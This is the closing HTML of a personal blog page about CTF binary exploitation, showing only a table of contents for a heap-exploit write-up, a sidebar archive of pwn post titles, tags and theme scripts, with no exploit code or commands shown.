class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%A6%96%E5%85%88%E5%88%A9%E7%94%A8%E5%A0%86%E5%9D%97%E5%90%88%E5%B9%B6%E6%94%B9%E5%86%99pre-size"><span class="toc-number">3.1.</span> <span class="toc-text">首先利用堆块合并改写pre_size</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#null-byte-overflow%E6%BC%8F%E6%B4%9E%E8%A6%86%E7%9B%96inuse%E6%A0%87%E5%BF%97%E4%BD%8D"><span class="toc-number">3.2.</span> <span class="toc-text">null-byte-overflow漏洞覆盖inuse标志位</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2unsorted-bin%E5%9C%B0%E5%9D%80"><span class="toc-number">3.3.</span> <span class="toc-text">泄露unsorted bin地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9E%84%E5%BB%BADouble-Free%EF%BC%8C%E5%B0%86free-hook%E6%8C%82%E8%BF%9Btcache-bin"><span class="toc-number">3.4.</span> <span class="toc-text">构建Double Free，将free_hook挂进tcache bin</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">4.</span> <span class="toc-text">exp</span></a></li></ol>
            </div>
        
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 34
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
        
            
            
            <div class="archive-year"> 2022 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">07/03</span>
            <a class="archive-post-title" href="/2022/07/03/0ctf_2018_babystack/">[Untitled Post]</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">07/02</span>
            <a class="archive-post-title" href="/2022/07/02/ret2dlresolve_x64/">ret2dlresolve_x64</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/29</span>
            <a class="archive-post-title" href="/2022/04/29/dl-runtime-resolve/">ret2dl-resolve</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/24</span>
            <a class="archive-post-title" href="/2022/04/24/%E5%BB%B6%E8%BF%9F%E7%BB%91%E5%AE%9A/">延迟绑定</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/22</span>
            <a class="archive-post-title" href="/2022/04/22/houseofAtum/">BCTF2018 House of Atum</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/20</span>
            <a class="archive-post-title" href="/2022/04/20/gundam/">HITBCTF2018 gundam</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/19</span>
            <a class="archive-post-title" href="/2022/04/19/IDA%20pro/">IDA pro创建结构体</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/18</span>
            <a class="archive-post-title" href="/2022/04/18/examination/">examination</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/17</span>
            <a class="archive-post-title" href="/2022/04/17/LCTF2018%20PWN%20easy_heap/">LCTF2018 easy_heap</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/08</span>
            <a class="archive-post-title" href="/2022/04/08/tcache/">tcache</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/07</span>
            <a class="archive-post-title" href="/2022/04/07/libc-2.26/">libc 2.26</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/07</span>
            <a class="archive-post-title" href="/2022/04/07/house-of-storm/">house of storm</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/04</span>
            <a class="archive-post-title" href="/2022/04/04/%E5%B3%BB%E6%9E%81pwn/">峻极pwn</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/19</span>
            <a class="archive-post-title" href="/2022/03/19/stack%20pivoting/">stack pivoting</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">02/26</span>
            <a class="archive-post-title" href="/2022/02/26/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/">操作系统</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/16</span>
            <a class="archive-post-title" href="/2022/01/16/large%20bin%20attack/">large bin attack</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/15</span>
            <a class="archive-post-title" href="/2022/01/15/magicheap/">magicheap</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/15</span>
            <a class="archive-post-title" href="/2022/01/15/unsorted%20bin%20attack/">unsorted bin attack</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/13</span>
            <a class="archive-post-title" href="/2022/01/13/pwn200/">pwn200</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/12</span>
            <a class="archive-post-title" href="/2022/01/12/write%20some%20paper/">write some paper</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/09</span>
            <a class="archive-post-title" href="/2022/01/09/fastbin_attack/">fastbin_attack</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/overlapping%20chunks/">overlapping chunks</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/gdb%E8%B0%83%E8%AF%95/">gdb的使用</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/ciscn_2019/">ciscn</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/csaw/">csaw部分题解</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/secretHolder_hitcon_2016/">secretHolder_hitcon_2016</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/unsafe_unlink/">unsafe_unlink</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/kernel_pwn%E7%8E%AF%E5%A2%83/">kernel pwn环境搭建</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/lab1%20%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A/">lab1实验报告</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/lab2%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A/">lab2 实验报告</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/off-by-one/">off-by-one</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2022/01/08/pwnable%E5%88%B7%E9%A2%98/">pwnable刷题</a>
        </li>
    
        
            
            
                
                </ul>
            
            <div class="archive-year"> Invalid date </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span>
            <a class="archive-post-title" href="/2022/04/25/srop/">srop</a>
        </li>
    
        
            
            
                
                </ul>
            
            <div class="archive-year"> Invalid date </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span>
            <a class="archive-post-title" href="/2022/05/07/%E9%9D%9E%E6%A0%88%E4%B8%8A%E7%9A%84%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/">非栈上的格式化字符串漏洞</a>
        </li>
    
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
        
            <span class="sidebar-tag-name" data-tags="tcache">
                <span class="iconfont-archer">&#xe606;</span>
                tcache
            </span>
        
            <span class="sidebar-tag-name" data-tags="os">
                <span class="iconfont-archer">&#xe606;</span>
                os
            </span>
        
            <span class="sidebar-tag-name" data-tags="unsorted bin attack">
                <span class="iconfont-archer">&#xe606;</span>
                unsorted bin attack
            </span>
        
            <span class="sidebar-tag-name" data-tags="house of spirit">
                <span class="iconfont-archer">&#xe606;</span>
                house of spirit
            </span>
        
            <span class="sidebar-tag-name" data-tags="pwn">
                <span class="iconfont-archer">&#xe606;</span>
                pwn
            </span>
        
            <span class="sidebar-tag-name" data-tags="fastbin doule free">
                <span class="iconfont-archer">&#xe606;</span>
                fastbin doule free
            </span>
        
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="Diary">
            <span class="iconfont-archer">&#xe60a;</span>
            Diary
        </span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMeta = {
        root: "/",
        author: "John Doe"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->


        <!-- main func -->
        <script src="/scripts/main.js?v=20210823"></script>
        <!-- dark mode -->
        <script src="/scripts/dark.js?v=20210823"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" defer></script>
        <!-- algolia -->
        
        <!-- busuanzi -->
        
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        
        <!-- CNZZ -->
        
        <!-- async load share.js -->
        
            <script src="/scripts/share.js?v=20210823" async></script>
        
        <!-- mermaid -->
        
    </body>
</html>
